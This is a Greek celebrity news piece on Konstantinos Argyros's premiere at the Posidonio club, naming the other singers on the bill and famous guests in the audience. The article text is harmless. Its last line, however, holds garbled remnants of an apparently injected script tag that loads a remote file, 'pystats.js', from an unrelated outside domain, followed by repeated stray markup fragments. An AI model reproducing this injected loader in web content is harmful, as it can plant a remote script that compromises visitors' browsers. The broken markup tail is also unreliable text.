Παρέλαση διασήμων στην πρεμιέρα του Αργυρού!

Παρέλαση διασήμων στην πρεμιέρα του Αργυρού! (ΦΩΤΟ)

Ο Κωνσταντίνος Αργυρός, ύστερα από ένα σύντομο χρονικό διάστημα ξεκούρασης, επέστρεψε απόλυτα ανανεωμένος κι έδωσε το σύνθημα της διασκέδασης με τη νέα επιτυχία του «Πάρε με αγκαλιά»….

που ο κόσμος κυριολεκτικά έχει λατρέψει, τις άλλες  επιτυχίες από το άλμπουμ «Δεύτερη φορά» («Να Της Πεις», «Δεύτερη Φορά»,«Εσένα Θέλω») αλλά και παλαιότερες που έκαναν τον κόσμο να διασκεδάζει και να μη σταματά να τον χειροκροτεί.

 

Μαζί του, ο Κώστας Μαρτάκης που ξέρει να διασκεδάζει το κοινό με αγαπημένα τραγούδια κι ακαταμάχητο performance, η Χριστίνα Σάλτη με το ξεχωριστό της μπρίο, η Θωμαή Απέργη με τη μοναδική φωνή της, ο ανερχόμενος λαϊκός τραγουδιστής Λευτέρης Κιντάτος, η Josephine, ο Marios Brasil, η Βαλένθια Διγενή, η Κατερίνα Μπουρνέλη.

Ο Κωνσταντίνος Αργυρός δίνει τον καλύτερό του εαυτό κι απογειώνει το κέφι όπως μόνο εκείνος ξέρει. Στο δεύτερο πρόγραμμά του μάλιστα καλεί τον Κώστα Μαρτάκη στην πίστα χαρίζοντας παρέα μοναδικά ντουέτα.

Στο κατάμεστο Posidonio και στην πανηγυρική πρεμιέρα διακρίναμε: τον  Δημήτρη Ουγγαρέζο , την κύπρια παρουσιάστρια Χριστιάννα Αριστοτέλους , την Κατερίνα Στικούδη, τον Πέτρο Ίμβριο, τον Τριαντάφυλλο με τη σύζυγό του, τους Jack Pot.

Στους ίδιους ξεσηκωτικούς ρυθμούς κινήθηκαν κι οι βραδιές του Σαββατοκύριακου που ακολούθησαν, με την  Άντζελα Δημητρίου το βράδυ της Κυριακής να διασκεδάζει πρώτο τραπέζι –πίστα στο Posidonio.

Την ίδια βραδιά στο Posidonio γλέντησε κι η Δέσποινα Ολυμπίου με την παρέα της. challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >